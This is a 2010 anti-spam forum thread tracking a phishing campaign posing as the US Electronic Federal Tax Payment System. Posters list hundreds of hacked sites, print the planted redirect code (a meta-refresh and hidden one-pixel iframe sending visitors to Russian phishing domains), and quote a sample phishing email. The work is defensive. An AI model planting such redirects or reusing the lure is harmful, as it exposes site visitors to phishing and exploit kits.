Electronic Federal Tax Payment System phish?

Phishing operations, including perpetrators, how to report them and get them shut down.

Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Tue Oct 19, 2010 3:40 am

These URLsL were found in spam, and redirect to sites on an nginx server, like
eftpsid0342943.ru/contacts/s3
eftpsid1363433.ru/contacts/s3

My guess is that this is a phishing attempt. These are all legitimate sites that have presumably been hacked, probably because of a weak admin or FTP password.

Each hacked site has had a folder added, and one or two html files (red4.html red5.html) inserted

ahgphotography.co.uk/6xdj0ns/red4.html
ahgphotography.co.uk/iltbqqr/red4.html
ahgphotography.co.uk/iltbqqr/red5.html
ashmorgan.co.uk/bcrent/red4.html
ashmorgan.co.uk/bcrent/red5.html
blog.tafpi.com/1r5jez/red4.html
blog.tafpi.com/1r5jez/red5.html
cooptel.qc.ca/~acme/g0fdre/red4.html
cooptel.qc.ca/~acme/g0fdre/red5.html
cpapselect.com.au/x063ln/red4.html
cpapselect.com.au/x063ln/red5.html
davefoxmotorcycles.co.uk/uvsml4/red4.html
davefoxmotorcycles.co.uk/uvsml4/red5.html
download.racersleague.com/gfkzhmu/red4.html
download.racersleague.com/gfkzhmu/red5.html
host.christianshirts.net/~jrisen33/qnhnmsi/red4.html
host.christianshirts.net/~jrisen33/qnhnmsi/red5.html
hostingme.co.cc/r2rv6e/red4.html
hostingme.co.cc/r2rv6e/red5.html
iceshield1234.ic.funpic.de/1ketz2/red5.html
indulgencebarandgrill.co.uk/nqym4zz/red5.html
marketinghelponline.com.au/lkb4kmb/red4.html
negeos89.ne.funpic.de/fl84ax/red4.html
northnorfolkdifferentstrokes.org.uk/36tv7t/red4.html
northnorfolkdifferentstrokes.org.uk/36tv7t/red5.html
olympiatotal.ol.funpic.de/n243tq/red4.html
ongbag.on.funpic.de/8yubt9/red5.html
ongbakdu.on.funpic.de/dc96hp/red4.html
ongbakdu.on.funpic.de/dc96hp/red5.html
outbackmag.com.au/tkqi0rp/red4.html
outbackmag.com.au/tkqi0rp/red5.html
peekabooimages.com.au/s2we7w/red4.html
peekabooimages.com.au/s2we7w/red5.html
raid77rush.ra.ohost.de/wag2he/red4.html
renderedmouse.vndv.com/k4pakco/red5.html
scoolout.sc.funpic.de/04npel/red4.html
teamfastplay.te.funpic.de/y5a17g/red4.html
teamfastplay.te.funpic.de/y5a17g/red5.html
themoor.myzen.co.uk/wohgevh/red4.html
themoor.myzen.co.uk/wohgevh/red5.html
trobl.velopers.net/f23b0ue/red4.html
venus.webcity.com.au/~spa33796/meegak0/red4.html
westbournedrylining.co.uk/oey7g7s/red4.html
www.5abi.com/3imz46t/red4.html
www.5abi.com/3imz46t/red5.html
www.brasseriebernstein.net/sw7j60/red4.html
www.compassphysicaltherapy.net/nwdbdo/red4.html
www.findyourlet.com/k1rquod/red4.html
www.findyourlet.com/k1rquod/red5.html
www.gingerflex.com/zd52g7/red4.html
www.goinvest.nl/91mp4a/red5.html
www.gracecommunity.info/7l89zl/red4.html
www.gracecommunity.info/7l89zl/red5.html
www.iqsignageprojects.com/flipb8/red4.html
www.iqsignageprojects.com/flipb8/red5.html
www.jwrightportfolio.com/xnvkmwu/red4.html
www.kfl.net/et4pe62/red4.html
www.muslimrobot.com/hvwkg4y/red4.html
www.noirebellestudio.com/zsq3ao/red5.html
www.oddmedia.com/kl4fct/red4.html
www.osusigmachi.com/52mlcd/red4.html
www.plazadiane.org/ylb8xo/red4.html
www.rolfferch.de/6xfbsu/red4.html
www.sebastiandunst.de/ibc3ja/red5.html
www.sportmedexcel.co.uk/f49urp/red5.html
www.telemarketingcanada.ca/l3a0dc/red4.html
www.telemarketingcanada.ca/l3a0dc/red5.html
www.thebody.co.nz/d0to35d/red5.html
www.theoakshomestead.co.nz/oakjp9/red4.html
www.tommyengel.de/fvy87iw/red5.html
www.wintersportmuseum.ch/253aicm/red4.html

bbpellets.co.uk/red5.html
byss.tchmachines.com/~brdywon/red5.html
cat.arvixe.com/~galo1801/red5.html
gator434.hostgator.com/~goldome7/red5.html
members.optusnet.com.au/~nathandenny/red5.html
prestigeprofiles.com.au/red5.html
www.crankradios.net/red5html
www.haimspiel.de/red5.html
www.polar2.de/red5.html
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Tue Oct 19, 2010 6:07 pm

The red4.html code contains
Code: Select all
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://eftpsid0362283.ru/contacts/s3">


The refresh loads a Russian phishing site such as eftpsid0362283.ru
A look-up shows that this was registered in Russia on October 14

domain: EFTPSID0362283.RU
nserver: ns1.freedns.ws.
nserver: ns2.freedns.ws.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
phone: +7 495 7139598
e-mail: babkins@pochtamt.ru
registrar: REGRU-REG-RIPN
created: 2010.10.14
paid-till: 2011.10.14
source: TCI

Another earlier redirection went to eftpsid0363536.com which was registered at Moniker on October 7

Domain Name: EFTPSID0363536.COM
Registrar: MONIKER ONLINE SERVICES, INC.
Whois Server: whois.moniker.com
Referral URL: http://www.moniker.com/whois.html
Name Server: NS1.DOMAINSERVICE.COM
Name Server: NS2.DOMAINSERVICE.COM
Name Server: NS3.DOMAINSERVICE.COM
Name Server: NS4.DOMAINSERVICE.COM
Status: redemptionPeriod
Updated Date: 13-oct-2010
Creation Date: 07-oct-2010


A directory listing of a typical infected machine shows that a number of additional folders were created from October 10. Most folders contain phishing links, others contain links to a pharmacy fraud. The added folders are 6 or 7 characters long and contain the html files that perform the redirections.The compromise of these servers is most likely achieved because of a simple password on the administrator or FTP accounts. The administrator of these compromised machines should
1. detect and erase the additional folders and their contents
2. change access passwords to a more robust format containing mixed case, numeric and special characters

Image
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby spamislame » Tue Oct 19, 2010 9:41 pm

I've been seeing tons of these since Spamit went down.

At no point have these urls ever loaded for me. In all cases both Google and numerous anti-malware products have instantly detected these urls as malicious.

When I do finally see a url that works, each of their html files are corrupt - they're also all less than 1k in size - and as a result I still have no idea what this is actually attempting to do nearly three weeks later.

Whoever is sending these is sending my domain in the hundreds of these messages per day, often several dozen per hour.

He doesn't seem to be very skilled.

First these were standalone domains, none of which would load. More recently, he's using hacked servers with a planted redirection html page. It's a routine apache exploit to get files onto the server, but in many cases it looks like this moron is not familiar enough with the exploit to tell when a given server is properly hacked and serving out the redirection pages.

Your examples at least do properly perform the redirections, but in all cases all I end up with is the following:

http://ongbakdu.on.funpic.de/dc96hp/red4.html

Redirects via a simple html meta-refresh to:

http://eftpsid0342943.ru/contacts/s3

That site merely outputs the text:

e44

What the hell is this trying to do?

It outputs the "e44" whether you have javascript enabled or not, so it's not an evasion of any sort.

This is a ridiculous spam campaign, poorly executed, by your typical unprepared Russian spamming moron.

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Electronic Federal Tax Payment System phish?

Postby Nodus » Tue Oct 19, 2010 10:52 pm

I just noticed there are quite a lot of newly verified entrys of this type in PhishTank (under "Internal Revenue Service"). So Red was right, this seems to be quite a large phishing operation. There's also a warning at IRS.gov:

http://www.irs.gov/newsroom/article/0,,id=229075,00.html?portlet=7

At the same time the previously so active PayPal phish seems to have almost disappeared. Something is definitely going on "somewhere" :).
Arf, she said
User avatar
Nodus
Spammer Obliterator
 
Posts: 2287
Joined: Fri Jun 15, 2007 7:05 pm

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Wed Oct 20, 2010 5:05 pm

The redX.html files of 157 bytes are simply a redirect using refresh

The compromised servers have had a folder with one or a few such files installed. In some cases there are several such folders. In other cases the redirecting html files are placed in the server's root directory.

Some of these redirects went to Canadian Neighbor Pharmacy which now sits side-by-side with this Russian phishing operation - eftpsidnnnnnnn.ru

See the McAfee SiteAdvisor page for example

Examples removed by funpic - http://detg.de.funpic.de/ - which had folder /wy00as containing fub5k.html (eftpsid phishing)
And http://detg.de.funpic.de/p36uao2/process.html Canadian Neighbor Pharmacy redirect

Another example of side-by-side installations - http://xsunshinexgirlx.xs.ohost.de/
One subdirectory - 8xjpmsw/process.html - wais used for the Canadian Neighbor Pharmacy fraud >> tabletsdrugstoreguide.com (now suspended)
others such as /sofo46/q9ccmw.html - were used for the eftpsid phishing attack

Here is a typical current example from compromised host http://www.tonycustomwood.com/red4.html
Code: Select all
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://eftpsid0342943.ru/contacts/s3">
</head><iframe src="http://eftpsid0342943.ru/contacts/s3" width=1 height=1></iframe>
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Wed Oct 20, 2010 5:17 pm

Here is a list of phishing URLs sitting on compromised systems, extracted from over 100 spammed in the past day

Code: Select all
rosecliffe.com.au/red10.html
editor.ne16.com/htmlEditor/redirectMessageID.asp
box688.bluehost.com/~chrisvx4/red3.html
host10.com1usa.com/~com4311/red4.html
pirateshipoffools.co.uk/red.html
rosecliffe.com.au/red10.html
s245.n34.n171.n68.static.myhostcenter.com/red10.html
sb.cyberspaceindia.com/~wkhindia/red9.html
sigma.ahwebhost.com/~jandres4/red3.html
www.bengaloncology.com/red8.html
www.deadpig.co.uk/red10.html
www.users.on.net/~emfcat08/red2.html
ns3.ezhoster.com/~truerife/red6.html
targetyouremail.co.uk/red9.html
www.deadpig.co.uk/red10.html
www.oddmedia.com/red6.html
www.tonycustomwood.com/red10.html
eir.lunarservers.com/~linda24/red6.html
maranello.dattaweb.com/~um000368/red.html
easydrop.primeportal.net/red2.html
rdiweb1.serveronline.net/red7.html
adventurelifesigns.co.uk/~colecu1v/red9.html
bbpellets.co.uk/red5.html
box372.bluehost.com/~startcat/red.html
box482.bluehost.com/~usefulev/red4.html
box495.bluehost.com/~blogdivv/red3.html
box688.bluehost.com/~chrisvx4/red3.html
box688.bluehost.com/~chrisvx4/red.html
byss.tchmachines.com/~brdywon/red5.html
cat.arvixe.com/~galo1801/red5.html
cpapselect.com.au/red2.html
devonbard.co.uk/red.html
digitaldruck.viabild.de/~Gerber/red8.html
easydrop.primeportal.net/red3.html
edain.lunarservers.com/~despe3/red8.html
editor.ne16.com/htmlEditor/redirectMessageID.asp
endevour.co.uk/red2.html
endevour.co.uk/red.html
hasi929.ha.funpic.de/red2.html
home.anadolu.edu.tr/~ssendur/red7.html
homepages4.cultrix.co.uk/~ahgcreat/red.html
host10.com1usa.com/~com4473/red2.html
host4.com1usa.com/~com3060/red4.html
images.afa.net/red2.html
images.afa.net/red8.html
india.dattaweb.com/~in000314/red8.html
maranello.dattaweb.com/~um000368/red4.html
members.optusnet.com.au/~nathandenny/red5.html
mtm.workingstyle.co.nz/red2.html
myspaceone.my.funpic.de/red3.html
nag2.22web.net/red3.html
nissan.websitewelcome.com/~enizedd/red3.html
njgaragesales.netfirms.com/red10.html
ns32175.ovh.net/~clabordena/red.html
otis.phpwebhosting.com/~lebz/red.html
pageuppro.pageuppro.com/~fencemax/red7.html
platinum.tritoncore.com/~ottendes/red3.html
prestigeprofiles.com.au/red5.html
prestigeprofiles.com.au/red8.html
procyon.lunarpages.com/~daves8/red3.html
ps04.guardiandns.com/~personal/red.html
rgvoice.com.ar/red7.html
sc.uzz.cba.pl/red2.html
server.ekonekta.com/~gosimple/red7.html
server.flattexthub.com/~working/red4.html
sigma.ahwebhost.com/~jandres4/red3.html
targetyouremail.co.uk/red2.html
tom.me.cz/red7.html
vhost5ftp.iomart.com/~hopeln203/red.html
voda28.voda28.com/~hunaezz/red9.html
web.ody.ca/~londonhottubs/red2.html
web.ody.ca/~londonhottubs/red9.html
webster.ki.tng.de/~deathskull/red3.html
webster.ki.tng.de/~deathskull/red9.html
web.thu.edu.tw/~s958246/red3.html
www.5abi.com/red9.html
www.beatboutique.info/red7.html
www.bergeng.com/red2.html
www.brioimages.com/red2.html
www.cepd.org.za/red6.html
www.compassphysicaltherapy.net/red7.html
www.crankradios.net/red5html
www.crankradios.net/red6html
www.exett.co.uk/red4.html
www.haimspiel.de/red5.html
www.haimspiel.de/red8.html
www.ipass.net/~a1idpirat/red9.html
www.ivestraining.com/red2.html
www.kentuckyshow.com/red6.html
www.oddmedia.com/red8.html
www.plazadiane.org/red9.html
www.polar2.de/red5.html
www.sanocur.de/red.html
www.sportandstyle24.com/red4.html
www.tonycustomwood.com/red4.html
yosoyluz.zcohosting.net/~souadmin/red8.html
yosoyluz.zcohosting.net/~souadmin/red9.html
gator434.hostgator.com/~goldome7/red5.html
homepages4.cultrix.co.uk/~ahgcreat/red7.html
host10.com1usa.com/~com4311/red10.html
psvbambini.ps.ohost.de/red9.html
s1.coachkyriltennis.com/~coachkyr/red3.html
valkanos.lunarpages.com/~bryce2/red9.html
webster.ki.tng.de/~deathskull/red3.html
webster.ki.tng.de/~deathskull/red8.html
rdiweb1.serveronline.net/red8.html
tom.me.cz/red.html
valkanos.lunarpages.com/~bryce2/red8.html
www.dgccsteel.com/red5.html
home.ptd.net/~tthomas3/red2.html
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby spamislame » Thu Oct 21, 2010 11:54 am

In almost all of these cases, whenever I attempt to load any of the red###.html files (in firefox) the following message is returned:

The connection was reset
The connection to the server was reset while the page was loading.

Many from a random sampling of that list have already been removed. :)

SiL
User avatar
spamislame
Site Admin
 
Posts: 5057
Joined: Tue May 09, 2006 9:18 am

Re: Electronic Federal Tax Payment System phish?

Postby meep » Thu Oct 21, 2010 12:08 pm

I have seen some of these spam myself, but no time really to look at them. Mike Lennon says in this Security Week article that this is just a ZeuS / ZBot trojan variant here using the typical fast flux DNS crap found on various botnets:

Cybercriminals Attack EFTPS.gov Users, Businesses Targeted in Another Massive ZeuS Attack

By Mike Lennon 10/15/10
A recent and growing attack has been targeting the business world, sending warning messages to recipients and notifying them of problems with their tax payments through the government’s EFTPS.gov Web site. As we write this the attack appears to be in full swing, with data showing a massive spike in the volume of malicious emails coming from this attack being sent today. ...
User avatar
meep
Spammers' Nightmare
 
Posts: 2777
Joined: Thu Apr 05, 2007 4:10 pm

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Thu Oct 21, 2010 9:01 pm

This comment hits the nail right on the head
"This attack involved over 800 compromised web servers whose only purpose was to redirect the victim's browser on to a web exploit toolkit. The criminals did this in an attempt to evade the URL reputation used by most anti-spam systems," said Cisco's Henry Stern.


By using legitimate servers and compromising them by adding a few files to achieve redirection, these criminals are not only avoiding URIBL backlisting, but also the complaint process to registrars regarding the criminals' own registered domains.
However, all redirections go to a smaller range of phishing sites which are the easier target to address, despite being located in a safe haven, Russia itself. Even if the owners of those sites are not ready to shut down the phishing sites at the registrar or ISP level, today's more sophisticated browsers can protect Internet users with their built-in reputation based systems -
eftpsid0342943.ru may try to steal your information.
Reported attack site!
This web page at eftpsid1363433.ru has been reported as an attack page and has been blocked based on your security preferences.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Thu Oct 21, 2010 11:07 pm

Sample phish:
Your Federal Tax Payment ID: 01037599117 has been rejected.
Please, check the information and refer to Code R21 to get details about your company payment in transaction contacts section:
http://eftps.gov/R21

Return Reason Code R21 - The identification number used in the Company Identification Field is not valid.
In other way forward information to your accountant adviser.

on the site. James was appointed guardian of his two younger brothers, William Wright and Joseph Tarpelin,
EFTPS:
The Electronic Federal Tax Payment System
WARNING!
You are using an Official United States Government System, which may be used only for authorized purposes. Unauthorized modification of any information stored on this system may result in criminal prosecution. The Government may monitor and audit the usage of this system, and all persons are hereby notified that the use of this system constitutes consent to such monitoring and auditing. Unauthorized attempts to upload information and/or change information on this web site are strictly prohibited and are subject to prosecution under the Computer Fraud and Abuse Act of 1986 and Title 18 U.S.C. Sec. 1001 and 1030.


The link tries to load http://andorland777.an.funpic.de/red.html but the folks at funpic.de have removed it.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Sat Oct 23, 2010 1:23 am

To date, we have seen 175 domains or service providers whose passwords were too easy to guess.
It is good practice to have passwords that are at least 10 characters in length, made up of alphabetic (a-z), numeric (0-9) and special (!@#$%^&*()_+-={}[]\|:";'<~`>?) characters

The domains detected as being used for EFTPS phishing are listed below.

If your domain name is on the list, check your system for the added files, remove them, and upgrade your administrator and FTP passwords to prevent further infections.

Code: Select all
5abi.com
adventurelifesigns.co.uk
ahgphotography.co.uk
andorland777.an.funpic.de
ashmorgan.co.uk
bandaddict.co.uk
bbpellets.co.uk
beatboutique.info
bengaloncology.com
bergeng.com
blog.beranet.de
blog.tafpi.com
bodyartuk.co.uk
bollywoodindianrestaurant.com.au
boulder.gtdinternet.com
box131.bluehost.com
box357.bluehost.com
box482.bluehost.com
box495.bluehost.com
box688.bluehost.com
brasseriebernstein.net
brioimages.com
brooklynunderwriting.com.au
byss.tchmachines.com
cat.arvixe.com
cepd.org.za
compassphysicaltherapy.net
cooptel.qc.ca
coriach.zxq.net
cpapdirectsydney.com.au
cpapselect.com.au
crankradios.net
crodnet.co.uk
davefoxmotorcycles.co.uk
dgccsteel.com
dhahn.dh.funpic.de
digitaldruck.viabild.de
divineandmine.co.uk
download.racersleague.com
duckduckgoose.co.uk
dyeworks.co.uk
easydrop.primeportal.net
edain.lunarservers.com
eir.lunarservers.com
ekriti.com
endevour.co.uk
ernestfries.com
exett.co.uk
f430.websitewelcome.com
ffbingerbrueck.ff.ohost.de
findyourlet.com
gator434.hostgator.com
gingerflex.com
goinvest.nl
gracecommunity.info
grtaieb.gr.ohost.de
haimspiel.de
hasi929.ha.funpic.de
headphones.co.nz
home.anadolu.edu.tr
home.comcast.net
home.ptd.net
homepages4.cultrix.co.uk
host.christianshirts.net
host10.com1usa.com
host4.com1usa.com
hostingme.co.cc
hudsonsquare.com.au
hybris.instanthosting.com.au
iceshield1234.ic.funpic.de
images.afa.net
india.dattaweb.com
indianaspn.org
indulgencebarandgrill.co.uk
ipass.net
iqsignageprojects.com
ivestraining.com
janahl.de
jmcwebonline.info
jwrightportfolio.com
kago24.de
kamil2007.my3gb.com
kentuckyshow.com
kfl.net
kjbsecurity.com
lcp1.irides.com
lemon.hosteurope.com
mail.jasonjollins.com
maranello.dattaweb.com
marketinghelponline.com.au
mathesonmclachlan.co.uk
mattyhorrocks.co.uk
meatreviews.co.uk
members.optusnet.com.au
mikedoner.com
mtm.workingstyle.co.nz
muslimrobot.com
myspaceone.my.funpic.de
mywavec.freewaywebhost.com
nag2.22web.net
negeos89.ne.funpic.de
nissan.websitewelcome.com
noirebellestudio.com
northnorfolkdifferentstrokes.org.uk
ns1.hyperflowhosting.com
ns3.ezhoster.com
oddmedia.com
olympiatotal.ol.funpic.de
ongbag.on.funpic.de
ongbakdu.on.funpic.de
osusigmachi.com
otis.phpwebhosting.com
outbackmag.com.au
pageuppro.pageuppro.com
patricksport24.de
peekabooimages.com.au
platinum.tritoncore.com
plazadiane.org
polar2.de
prestigeprofiles.com.au
procyon.lunarpages.com
psvbambini.ps.ohost.de
raffaelmache.de
raid77rush.ra.ohost.de
rdiweb1.serveronline.net
renderedmouse.vndv.com
rgvoice.com.ar
riderforum.ri.ohost.de
rolfferch.de
s1.coachkyriltennis.com
s329659351.onlinehome.us
sb.cyberspaceindia.com
sc.uzz.cba.pl
scoolout.sc.funpic.de
seanmackie.talktalk.net
sebastiandunst.de
server.ekonekta.com
server.flattexthub.com
servera80.opencom.com
sigma.ahwebhost.com
sleader.talktalk.net
sparkle.superdomainzone.com
spica.lunarpages.com
sportandstyle24.com
sportmedexcel.co.uk
sternenstaub2004.st.funpic.de
stunningdeal.co.nz
sustainabletn.org
tafurmultimedia.com
targetyouremail.co.uk
teamfastplay.te.funpic.de
telemarketingcanada.ca
thebody.co.nz
thedarkphoenix.kilu.de
themoor.myzen.co.uk
theoakshomestead.co.nz
tom.me.cz
tommyengel.de
tonycustomwood.com
totalconcepttraining.co.uk
trobl.velopers.net
usa.capsaicin.co.nz
users.on.net
valkanos.lunarpages.com
venus.webcity.com.au
voda28.voda28.com
web.ody.ca
web.thu.edu.tw
webster.ki.tng.de
westbournedrylining.co.uk
wintersportmuseum.ch
wp1042355.wp065.webpack.hosteurope.de
xsunshinexgirlx.xs.ohost.de
xxex3.xx.ohost.de
yosoyluz.zcohosting.net
yourwebsitecoach.net
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby NotBuyingIt » Mon Oct 25, 2010 2:19 pm

meep wrote:Mike Lennon says ... that this is just a ZeuS / ZBot trojan variant here using the typical fast flux DNS crap found on various botnets
The scam uses not-very-fast-at-all flux DNS as if the changes are being done manually. I suppose it may qualify as a "double flux" DNS tactic because over the course of several days, the DNS provider changes. I have forgotten at least one of those DNS providers, but the scam alternates between afraid.org and freedns.ws, and is newly using xtremeweb.de

The template of the URLs used for redirection has changed from "http://stooge-site.com/red*.html" to "http://stooge-site.com/about.html"
Home is where the heart is / No matter how the heart lives.
NotBuyingIt
Spammer Killing Machine
 
Posts: 611
Joined: Sun Jun 13, 2010 5:22 pm

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Mon Oct 25, 2010 10:11 pm

Please see the informatin in the Botnets, Hijacks and Hijacking Forum for examples.

This infection changes daily and alternates between Pharmacy targets and Phish

viewtopic.php?f=23&p=49261

Today, eftpsid is back in vogue.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby Red Dwarf » Mon Oct 25, 2010 10:17 pm

NotBuyingIt wrote:
meep wrote:Mike Lennon says ... that this is just a ZeuS / ZBot trojan variant here using the typical fast flux DNS crap found on various botnets
The scam uses not-very-fast-at-all flux DNS as if the changes are being done manually. I suppose it may qualify as a "double flux" DNS tactic because over the course of several days, the DNS provider changes. I have forgotten at least one of those DNS providers, but the scam alternates between afraid.org and freedns.ws, and is newly using xtremeweb.de


Journalists have learned to use technical expressions like Zeus botnet and Fast-flux DNS.
Only a few have learned what they mean. I fear that Mike Lennon is not yet one of the few.
User avatar
Red Dwarf
You are kiillllling-a my bizinisss!
 
Posts: 10478
Joined: Tue Jun 27, 2006 2:01 am

Re: Electronic Federal Tax Payment System phish?

Postby Bobster » Tue Nov 09, 2010 3:28 pm

Based on the spam I have received, I strongly suspect that the criminal (or criminals) behind this is the same one that recently hacked Aweber for the second time in less than a year.
"The trouble with the world is that the stupid are cocksure
and the intelligent are full of doubt." -- Bertrand Russell
Bobster
Spam Reporter
 
Posts: 207
Joined: Fri Mar 23, 2007 4:16 pm


Return to Phishers

Who is online

Users browsing this forum: No registered users and 1 guest

cron